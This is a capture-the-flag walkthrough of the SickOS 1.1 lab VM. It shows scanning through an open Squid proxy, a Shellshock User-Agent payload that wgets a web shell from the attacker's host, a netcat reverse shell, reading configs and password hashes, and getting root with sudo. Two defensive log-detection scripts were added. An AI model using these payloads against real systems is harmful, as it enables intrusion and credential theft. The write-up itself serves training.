SickOS 1.1 Solution

Name........: SickOs1.1
Date Release: 11 Dec 2015
Author......: D4rk
Series......: SickOs
Objective...: Get /root/a0216ea4d51874464078c618298b1367.txt
Tester(s)...: h1tch1
Twitter.....: https://twitter.com/D4rk36

DESCRIPTION

This is a quick walk through/solution for SickOS v1.1 which can be downloaded below. Despite there being several write ups for this challenge, I decided to post my own methods of attack and share my mindset going through this challenge in hopes that it may help others.

DOWNLOAD

https://www.vulnhub.com/entry/sickos-11,132/

DISCOVERY

# netdiscover -r 192.168.1.0/24
 Currently scanning: Finished!   |   Screen View: Unique Hosts

 7 Captured ARP Req/Rep packets, from 7 hosts.   Total size: 402
 _____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor                   
 ----------------------------------------------------------------------------- 
 192.168.1.122   00:0c:29:16:91:9d    01    042   VMware, Inc.                                                                                                                                                                         

ENUMERATION

Now that we have the IP address of our new VM, we can start enumerating open ports/services to determine our plan of attack. For this phase, I always rely on “Sn1per” which can be downloaded here: https://github.com/1N3/Sn1per

# ./sniper 192.168.1.0/24
                ____               
    _________  /  _/___  ___  _____
   / ___/ __ \ / // __ \/ _ \/ ___/
  (__  ) / / // // /_/ /  __/ /    
 /____/_/ /_/___/ .___/\___/_/     
               /_/                 

 + -- --=[http://xerosecurity.com
 + -- --=[sn1per v1.5 by 1N3

################################### Running recon #################################
Server:		206.248.154.22
Address:	206.248.154.22#53

** server can't find 122.1.168.192.in-addr.arpa: NXDOMAIN

Host 122.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)

################################### Pinging host ###################################
PING 192.168.1.122 (192.168.1.122) 56(84) bytes of data.

--- 192.168.1.122 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms


################################### Running port scan ##############################

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-02 12:27 EST
Nmap scan report for 192.168.1.122
Host is up (0.00028s latency).
Not shown: 65532 filtered ports, 1 closed port
PORT     STATE SERVICE    VERSION
22/tcp   open  ssh        OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
3128/tcp open  http-proxy Squid http proxy 3.1.19
| http-open-proxy: Potentially OPEN proxy.
|_Methods supported:GET
|_http-server-header: squid/3.1.19
|_http-title: ERROR: The requested URL could not be retrieved
MAC Address: 00:0C:29:16:91:9D (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.28 ms 192.168.1.122

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 103.27 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-02 12:28 EST
Nmap scan report for 192.168.1.122
Host is up (0.00029s latency).
PORT     STATE         SERVICE      VERSION
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
88/udp   open|filtered kerberos-sec
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
| snmp-hh3c-logins: 
|_  baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:16:91:9D (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.29 ms 192.168.1.122

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 125.01 seconds

################################### Running Intrusive Scans ########################
+ -- --=[Port 21 closed... skipping.
+ -- --=[Port 22 opened... running tests...

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-02 12:31 EST
Nmap scan report for 192.168.1.122
Host is up (0.00028s latency).
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 5.9p1 Debian 5ubuntu1.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 09:3d:29:a0:da:48:14:c1:65:14:1e:6a:6c:37:04:09 (DSA)
|   2048 84:63:e9:a8:8e:99:33:48:db:f6:d5:81:ab:f2:08:ec (RSA)
|_  256 51:f6:eb:09:f6:b3:e6:91:ae:36:37:0c:c8:ee:34:27 (ECDSA)
MAC Address: 00:0C:29:16:91:9D (VMware)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.87 seconds

PLAN OF ATTACK

Now that we’ve enumerated all open ports and services, we can see that our only options for attack vectors are:

1) Exploiting or brute forcing SSH
2) Attempting to connect to the Squid open proxy server to pivot off of

Since our brute force of common usernames and passwords already failed and there don’t seem to be any known exploits for this version of SSH, our only option seems to be to leverage the proxy and see what else we can find. To do this, I used Burpsuite proxy and added upstream proxies back to the SickOS IP address.

After Burpsuite is configured, we can now browse to the IP address via a web browser connected to Burpsuite in order to connect to ports that may be open locally on the box. As we can see below, the root of the web server can be reached locally and contains the following code:

GET http://192.168.1.122/ HTTP/1.1
Host: 192.168.1.122
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Cookie: PHPSESSID=3pqr9365an8p7rktmep2hjauo2

HTTP/1.0 200 OK
Date: Sat, 02 Jan 2016 20:00:14 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.21
Vary: Accept-Encoding
Content-Length: 21
Content-Type: text/html
X-Cache: MISS from localhost
X-Cache-Lookup: MISS from localhost:3128
Via: 1.0 localhost (squid/3.1.19)
Connection: close

<h1>
BLEHHH!!!
</h1>
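
The response above came from a web server that the port scan showed as filtered, reached only because the proxy forwarded the request to its own host. As an added example (not part of the original write-up), the following flags that pattern in a Squid access log; the log lines are constructed, and the proxy address set and field layout (Squid's native log format) are assumptions.

```python
import ipaddress
from urllib.parse import urlsplit

# Constructed sample in Squid's native access.log layout:
# time elapsed client action/status bytes method URL ident hierarchy/peer type
SAMPLE_LOG = """\
1451764814.101     12 192.168.1.149 TCP_MISS/200 345 GET http://192.168.1.122/ - DIRECT/192.168.1.122 text/html
1451764815.402      9 192.168.1.149 TCP_MISS/200 412 GET http://127.0.0.1/robots.txt - DIRECT/127.0.0.1 text/plain
1451764816.733     41 192.168.1.149 TCP_MISS/200 9120 GET http://example.com/ - DIRECT/203.0.113.10 text/html
1451764817.020      3 192.168.1.149 TCP_DENIED/403 3540 CONNECT localhost:22 - NONE/- text/html
"""

# Assumption: addresses that belong to the proxy host itself.
PROXY_ADDRS = {ipaddress.ip_address("192.168.1.122")}
LOCAL_NAMES = {"localhost"}


def destination_host(method, url):
    """Return the host a proxied request is aimed at."""
    if method == "CONNECT":               # CONNECT carries host:port, not a URL
        host = url.rsplit(":", 1)[0]
    else:
        host = urlsplit(url).hostname or ""
    return host.strip("[]").lower()


def is_self_target(host):
    """True when the destination is loopback or the proxy's own address."""
    if host in LOCAL_NAMES:
        return True
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:                    # ordinary DNS name
        return False
    return ip.is_loopback or ip in PROXY_ADDRS


def find_self_proxying(log_text):
    """List proxied requests that point back at the proxy host."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 10:
            continue                      # not a complete native-format record
        client, action, method, url = fields[2], fields[3], fields[5], fields[6]
        host = destination_host(method, url)
        if is_self_target(host):
            hits.append({
                "client": client,
                "host": host,
                "allowed": not action.startswith("TCP_DENIED"),
            })
    return hits


if __name__ == "__main__":
    for hit in find_self_proxying(SAMPLE_LOG):
        print(hit)
```

Any hit with `allowed` set to true means the proxy is exposing services that the host firewall was meant to hide.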

Since there isn’t any linked content in the root web page, we’ll need to manually brute force files and directories in order to discover any hidden content. This can be done using Burpsuite or DirBuster or any other web content discovery methods. After some time, you should be able to discover a robots.txt page. This reveals some other web content that may be helpful to us.

ROBOTS.TXT

GET http://192.168.1.122/robots.txt HTTP/1.1
Host: 192.168.1.122
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.122/shell.php?act=sql&sql_login=root&[email protected]&sql_server=localhost&sql_port=3306&sql_db=mysql&sql_tbl=user
Cookie: PHPSESSID=3pqr9365an8p7rktmep2hjauo2
Connection: close

HTTP/1.0 200 OK
Date: Sat, 02 Jan 2016 19:58:29 GMT
Server: Apache/2.2.22 (Ubuntu)
Last-Modified: Sat, 05 Dec 2015 00:35:02 GMT
ETag: "40ca5-2d-5261bcb6b1d0f"
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 45
Content-Type: text/plain
X-Cache: MISS from localhost
X-Cache-Lookup: MISS from localhost:3128
Via: 1.0 localhost (squid/3.1.19)
Connection: close

User-agent: *
Disallow: /
Dissalow: /wolfcms

After discovering the wolfcms site, I was unable to find any exploitable web vulnerabilities 🙁 However, in the process of my web content brute force, I did notice a /cgi-bin/ directory and decided to continue my brute force to enumerate any scripts here.

SHELLSHOCK EXPLOIT

After discovering /cgi-bin/status, I attempted to exploit Shellshock via Burpsuite using a method I previously blogged about here since Shellshock affected many cgi and perl programs.

GET http://192.168.1.122/cgi-bin/status HTTP/1.1
Host: 192.168.1.122
User-Agent: () { :;}; /bin/bash -c "wget http://192.168.1.149/c100.txt -O /var/www/shell.php"
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close

GET http://192.168.1.122/shell.php HTTP/1.1
Host: 192.168.1.122
User-Agent: test
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
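
Both requests above leave a trace in the target's Apache access log. As an added detection example (not part of the original write-up), the following scans combined-format log lines for the bash function-definition prefix and then for later requests to any file the payload wrote under the web root; the log lines are constructed, and the /var/www document root is taken from the request shown above.

```python
import re

# Apache "combined" format; quoted fields may contain \" escapes.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
LOG_RE = re.compile(
    r'(?P<client>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    + QUOTED.replace("(", "(?P<request>", 1) + r' (?P<status>\d{3}) \S+ '
    + QUOTED.replace("(", "(?P<referer>", 1) + " "
    + QUOTED.replace("(", "(?P<agent>", 1)
)
FUNC_DEF_RE = re.compile(r'\(\s*\)\s*\{')        # "() {" with optional spacing
WEBROOT_RE = re.compile(r'/var/www/([\w.\-/]+)')  # assumption: docroot is /var/www

# Constructed sample lines; Apache writes embedded quotes as \".
SAMPLE_LOG = r'''
192.168.1.149 - - [02/Jan/2016:15:00:01 -0500] "GET /cgi-bin/status HTTP/1.1" 200 197 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0"
192.168.1.149 - - [02/Jan/2016:15:00:09 -0500] "GET /cgi-bin/status HTTP/1.1" 200 197 "-" "() { :;}; /bin/bash -c \"wget http://192.168.1.149/c100.txt -O /var/www/shell.php\""
192.168.1.149 - - [02/Jan/2016:15:00:15 -0500] "GET /shell.php HTTP/1.1" 200 5120 "-" "test"
192.168.1.149 - - [02/Jan/2016:15:00:20 -0500] "GET /robots.txt HTTP/1.1" 200 45 "-" "test"
'''.strip()


def scan(log_text):
    """Return (line_no, rule, detail) alerts for a combined-format log."""
    alerts, dropped = [], set()
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue                      # unparseable line, skip it
        parts = m["request"].split(" ")
        path = parts[1].split("?")[0] if len(parts) > 1 else ""
        for field in ("request", "referer", "agent"):
            if FUNC_DEF_RE.search(m[field]):
                alerts.append((line_no, "shellshock-pattern", field))
                # Remember web-root paths named in the payload.
                dropped.update("/" + p for p in WEBROOT_RE.findall(m[field]))
                break
        else:
            if path in dropped:
                alerts.append((line_no, "request-for-dropped-file", path))
    return alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert)
```

The combined format records only the request line, Referer and User-Agent, so a payload carried in any other header reaches the CGI environment without appearing in this log.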

REMOTE CONFIRMATION

==> /var/log/apache2/crowdshield_access.log <==
192.168.1.1 - - [02/Jan/2016:12:13:11 -0500] "GET /.testing/shellshock.txt?vuln=4 HTTP/1.1" 200 419 "-" "Wget/1.13.4 (linux-gnu)"
192.168.1.1 - - [02/Jan/2016:12:13:11 -0500] "GET /.testing/shellshock.txt?vuln=5 HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:12 -0500] "GET /.testing/shellshock.txt?sleep=1 HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:15 -0500] "GET /.testing/shellshock.txt?sleep=3 HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:16 -0500] "GET /.testing/shellshock.txt?vuln=16?user=www-data HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:17 -0500] "GET /.testing/shellshock.txt?vuln=17?user=www-data HTTP/1.1" 200 419 "-" "Wget/1.13.4 (linux-gnu)"
192.168.1.1 - - [02/Jan/2016:12:13:18 -0500] "GET /.testing/shellshock.txt?vuln=18?pwd=/usr/lib/cgi-bin HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:18 -0500] "GET /.testing/shellshock.txt?sleep=6 HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:18 -0500] "GET /.testing/shellshock.txt?vuln=19?pwd=/usr/lib/cgi-bin HTTP/1.1" 200 419 "-" "Wget/1.13.4 (linux-gnu)"
192.168.1.1 - - [02/Jan/2016:12:13:19 -0500] "GET /.testing/shellshock.txt?vuln=20?shadow= HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:19 -0500] "GET /.testing/shellshock.txt?vuln=21?shadow= HTTP/1.1" 200 419 "-" "Wget/1.13.4 (linux-gnu)"
192.168.1.1 - - [02/Jan/2016:12:13:20 -0500] "GET /.testing/shellshock.txt?sleep=9 HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:20 -0500] "GET /.testing/shellshock.txt?vuln=22?uname=Linux HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:21 -0500] "GET /.testing/shellshock.txt?vuln=23?uname=Linux HTTP/1.1" 200 419 "-" "Wget/1.13.4 (linux-gnu)"
192.168.1.1 - - [02/Jan/2016:12:13:22 -0500] "GET /.testing/shellshock.txt?vuln=24?shell= HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:22 -0500] "GET /.testing/shellshock.txt?vuln=25?shell= HTTP/1.1" 200 419 "-" "Wget/1.13.4 (linux-gnu)"
192.168.1.1 - - [02/Jan/2016:12:13:22 -0500] "GET /.testing/shellshock.txt?vuln=26?shell= HTTP/1.1" 200 363 "-" "curl/7.22.0 (i686-pc-linux-gnu) libcurl/7.22.0 OpenSSL/1.0.1 zlib/1.2.3.4 libidn/1.23 librtmp/2.3"
192.168.1.1 - - [02/Jan/2016:12:13:22 -0500] "GET /.testing/shellshock.txt?vuln=27?shell= HTTP/1.1" 200 419 "-" "Wget/1.13.4 (linux-gnu)"

PRIVILEGE ESCALATION

After pulling down the backdoor script from my remote server, I now had a full remote web shell with command execution and SQL command execution. From here, I went through the normal routes of privilege escalation on Linux by gathering information from the target and re-assessing my attack vectors.

$ uname -a 
Linux SickOs 3.11.0-15-generic #25~precise1-Ubuntu SMP Thu Jan 30 17:42:40 UTC 2014 i686 i686 i386 GNU/Linux


$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:105::/var/run/dbus:/bin/false
whoopsie:x:103:106::/nonexistent:/bin/false
landscape:x:104:109::/var/lib/landscape:/bin/false
sshd:x:105:65534::/var/run/sshd:/usr/sbin/nologin
sickos:x:1000:1000:sickos,,,:/home/sickos:/bin/bash
mysql:x:106:114:MySQL Server,,,:/nonexistent:/bin/false

NETCAT REVERSE SHELL

Even though I had a full remote web shell, I decided to spawn a netcat reverse shell for easier command line access.

$ nc -lvvp 31337 # ON LOCAL HOST
$ nc 192.168.1.149 31337 -e /bin/bash # ON REMOTE HOST

ls
CONTRIBUTING.md
README.md
composer.json
config.php
docs
favicon.ico
index.php
public
robots.txt
wolf

cat config.php

// Database information:
// for SQLite, use sqlite:/tmp/wolf.db (SQLite 3)
// The path can only be absolute path or :memory:
// For more info look at: www.php.net/pdo

// Database settings:
define('DB_DSN', 'mysql:dbname=wolf;host=localhost;port=3306');
define('DB_USER', 'root');
define('DB_PASS', '[email protected]');
define('TABLE_PREFIX', '');

MYSQL DATA DUMP

Now that I had the username/password for MySQL, I leveraged my web shell in order to gain access to the DB and dump the following creds.

use wolf; SELECT * FROM user;

id	name	email	username	password	salt	language	last_login	last_failure	failure_count	created_on	updated_on	created_by_id	updated_by_id	Action
	1	Administrator	[email protected]	admin	3a1be46a798dce0d880f633ce195b676839a0ce344c917a7ea1270816dcb649ce1e2b811b56fe93c9d3c4e679151180129ee9483ea39bff4d4578c4be6c77e1f	6806b774443f2c34231eceddf156a42d3c26a2b5219ee9d55f5e3c9aea534167	en	2015-12-05 07:47:16	NULL	0	2015-12-05 06:25:06	2015-12-05 07:47:16	1	NULL	Delete Edit 


use mysql; SELECT * FROM user;

	Host	User	Password	Select_priv	Insert_priv	Update_priv	Delete_priv	Create_priv	Drop_priv	Reload_priv	Shutdown_priv	Process_priv	File_priv	Grant_priv	References_priv	Index_priv	Alter_priv	Show_db_priv	Super_priv	Create_tmp_table_priv	Lock_tables_priv	Execute_priv	Repl_slave_priv	Repl_client_priv	Create_view_priv	Show_view_priv	Create_routine_priv	Alter_routine_priv	Create_user_priv	Event_priv	Trigger_priv	Create_tablespace_priv	ssl_type	ssl_cipher	x509_issuer	x509_subject	max_questions	max_updates	max_connections	max_user_connections	plugin	authentication_string	Action
	localhost	root	*A7A20B93EC076311A63BF86B5C705B25C054DD77	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	NULL	NULL	NULL	NULL	0	0	0	0	NULL	NULL	Delete Edit 
	sickos	root	*A7A20B93EC076311A63BF86B5C705B25C054DD77	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	NULL	NULL	NULL	NULL	0	0	0	0	NULL	NULL	Delete Edit 
	127.0.0.1	root	*A7A20B93EC076311A63BF86B5C705B25C054DD77	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	NULL	NULL	NULL	NULL	0	0	0	0	NULL	NULL	Delete Edit 
	::1	root	*A7A20B93EC076311A63BF86B5C705B25C054DD77	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	NULL	NULL	NULL	NULL	0	0	0	0	NULL	NULL	Delete Edit 
	localhost	debian-sys-maint	*CB98094782C386F2459D65D97B17D1DE15D1654B	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	Y	N	NULL	NULL	NULL	NULL	0	0	0	0	NULL	NULL	Delete Edit 

 

GAINING REMOTE SSH SHELL

Since I was able to enumerate all valid users (sickos) and some passwords ([email protected]), I decided to use this info to see if I could log in via SSH and sure enough, this worked!

[email protected]:~# ssh [email protected]
[email protected]'s password: 
Welcome to Ubuntu 12.04.4 LTS (GNU/Linux 3.11.0-15-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Sun Jan  3 01:20:33 IST 2016

  System load:  0.0               Processes:           117
  Usage of /:   4.7% of 28.42GB   Users logged in:     0
  Memory usage: 11%               IP address for eth0: 192.168.1.122
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

128 packages can be updated.
96 updates are security updates.

New release '14.04.3 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Tue Sep 22 08:32:44 2015
[email protected]:~$ 

[email protected]:~$ cd /home
[email protected]:/home$ ls
sickos
[email protected]:/home$ cd sickos/
[email protected]:~$ ls
[email protected]:~$ ls -lah
total 32K
drwxr-xr-x 3 sickos sickos 4.0K Jan  3 01:21 .
drwxr-xr-x 3 root   root   4.0K Sep 22 08:19 ..
-rw------- 1 sickos sickos   13 Sep 22 09:20 .bash_history
-rw-r--r-- 1 sickos sickos  220 Sep 22 08:19 .bash_logout
-rw-r--r-- 1 sickos sickos 3.5K Sep 22 08:19 .bashrc
drwx------ 2 sickos sickos 4.0K Sep 22 08:32 .cache
-rw------- 1 sickos sickos   28 Jan  3 01:21 .mysql_history
-rw-r--r-- 1 sickos sickos  675 Sep 22 08:19 .profile

[email protected]:~$ cat .bash_history | less
 sudo su

GAME OVER

Now that I had a valid shell, one of the first things I tried was sudoing to “root”. Luckily it worked and from here, I now had full control of the server and could view the flag!

[email protected]:~$ sudo su
[sudo] password for sickos: 

[email protected]:/home/sickos# whoami
root

[email protected]:/home/sickos# cd /root

[email protected]:~# ls
a0216ea4d51874464078c618298b1367.txt

[email protected]:~# cat a0216ea4d51874464078c618298b1367.txt 
If you are viewing this!!

ROOT!

You have Succesfully completed SickOS1.1.
Thanks for Trying


[email protected]:~# 
